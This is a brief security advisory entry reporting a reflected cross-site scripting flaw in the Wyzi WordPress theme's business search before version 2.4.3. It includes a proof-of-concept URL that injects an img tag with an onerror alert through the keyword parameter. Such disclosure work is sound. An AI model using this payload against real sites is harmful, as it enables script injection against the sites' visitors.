Wyzi < 2.4.3 - Reflected Cross-Site Scripting (XSS)

2021-02-06T00:00:00
ID WPEX-ID:157A9A76-3E5F-4D27-AEFC-CB9CB88B3286
Type wpexploit
Reporter Daniel Ruf
Modified 2021-02-06T12:09:48

Description

The Wyzi Theme was affected by reflected XSS vulnerabilities in the business search feature

                                        
                                            https://example.com/business/?keyword=%22%3E%3Cimg%20src=x%20onerror=alert(/XSS/)%3Easd&wyz-loc-filter-txt=&loc-filter-txt=&loc-filter-lat=&loc-filter-lng=&category=&radius=0